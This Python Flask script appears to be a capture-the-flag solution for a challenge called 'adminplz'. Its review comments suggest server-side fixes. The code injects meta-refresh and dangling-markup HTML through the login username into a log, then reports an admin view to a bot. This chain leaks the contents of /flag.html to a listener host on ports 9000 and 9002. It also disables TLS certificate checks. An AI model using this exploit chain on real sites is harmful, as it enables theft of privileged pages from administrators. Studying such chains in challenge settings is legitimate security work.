from flask import *
import requests
from threading import Thread
from time import sleep
# Flask application object; the step routes in this file register on it.
app = Flask(__name__)

# --- Constants -------------------------------------------------------------
# The second assignment wins, so the local URL is dead unless the remote line
# is removed or commented out.
base_url = "http://local:80"
base_url = "https://inst-3c3b5cabbd99902e.adminplz.chal.uiuc.tf"
# Strip a single trailing slash so f"{base_url}/path" never yields "//".
base_url = base_url[:-1] if base_url.endswith("/") else base_url

# One shared requests.Session, so cookies persist across the calls below.
sess = requests.Session()
# NOTE(review): certificate verification is disabled for every request made
# through this session. The remote base_url is https, so the server's identity
# is never checked and responses cannot be trusted to come from that host.
sess.verify = False
# --- End constants ---------------------------------------------------------
def report(url):
    """Submit *url* to the service's ``/report`` endpoint.

    The value is sent as the form field ``url`` through the shared session.
    The response is discarded, so a rejected or failed report goes unnoticed.
    """
    print("reporting ->", url)
    endpoint = f"{base_url}/report"
    form = {"url": url}
    sess.post(endpoint, data=form)
def send(payload):
    """Log in with *payload* as the username, then fetch the admin flag view.

    Both requests go through the shared session and both responses are
    discarded. The password is the fixed string ``"x"``.

    NOTE(review): the username field is the only caller-controlled value here.
    The callers pass HTML markup in it, so presumably the service stores or
    logs the username unescaped. If so, the service-side fix is to HTML-encode
    it wherever it is rendered. Confirm against the service source.
    """
    print(base_url, payload)
    login_endpoint = f"{base_url}/login"
    credentials = {"username": payload, "password": "x"}
    sess.post(login_endpoint, data=credentials)
    flag_view = f"{base_url}/admin?view=file:/flag.html"
    sess.get(flag_view)
@app.route("/step0")
def step0():
    """Handle ``/step0``: submit a meta-refresh username, then report the log view.

    The username is a ``<meta http-equiv="refresh">`` tag with an 8 second
    delay that points at ``/step1`` on port 9002. ``ip`` in that URL looks
    like a placeholder for this listener's address. The URL reported
    afterwards is the admin view of ``/var/log/adminplz/latest.log`` on
    127.0.0.1:8080.

    NOTE(review): this only has an effect if the admin view renders the log
    file as HTML. Serving log content as text, or HTML-encoding it on output,
    and refusing ``file:`` targets in ``view`` would presumably close this.
    Confirm against the service source.
    """
    log_view = "http://127.0.0.1:8080/admin?view=file:/var/log/adminplz/latest.log"
    refresh_markup = """
<meta http-equiv="refresh" content='8;URL=http://ip:9002/step1'>
"""
    send(refresh_markup)
    report(log_view)
    return "reported, should come in 8s"
def close_markup():
    """Wait ten seconds, then submit ``'>`` as a username.

    Runs in the background thread started by ``step1``. The two characters
    terminate the quoted attribute and the tag that ``step1`` left open.
    """
    delay_seconds = 10
    sleep(delay_seconds)
    closing_fragment = "'>"
    send(closing_fragment)
@app.route("/step1")
def step1():
    """Handle ``/step1``: submit an unterminated meta tag, then redirect.

    The username sent here is a meta-refresh tag whose ``content`` attribute
    is left unclosed (dangling markup). A background thread closes it ten
    seconds later via ``close_markup``. The requester is answered with a 302
    to the admin view of ``file:/flag.html`` on 127.0.0.1:8080.

    NOTE(review): an unclosed attribute absorbs whatever is rendered after it,
    up to the next matching quote. HTML-encoding the logged username on output
    would presumably stop that. Confirm against the service source.
    """
    # Unterminated on purpose: the attribute's closing quote is sent later.
    dangling = """
<meta http-equiv="refresh" content='0;URL=http://ip:9000/redir?a=
"""
    dangling += "\n"
    send(dangling)

    # Close the markup from a background thread so this response is not delayed.
    Thread(target=close_markup).start()
    print("thread in bg")

    flag_view = "http://127.0.0.1:8080/admin?view=file:/flag.html"
    return redirect(flag_view, code=302)
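# Serve the step routes on every interface, port 9002.
# debug stays off: Flask's debug mode enables the Werkzeug interactive
# debugger (code execution in this process) and the auto-reloader. With the
# 0.0.0.0 bind, that debugger would be reachable by any host that can reach
# this port.
app.run("0.0.0.0", port=9002, debug=False)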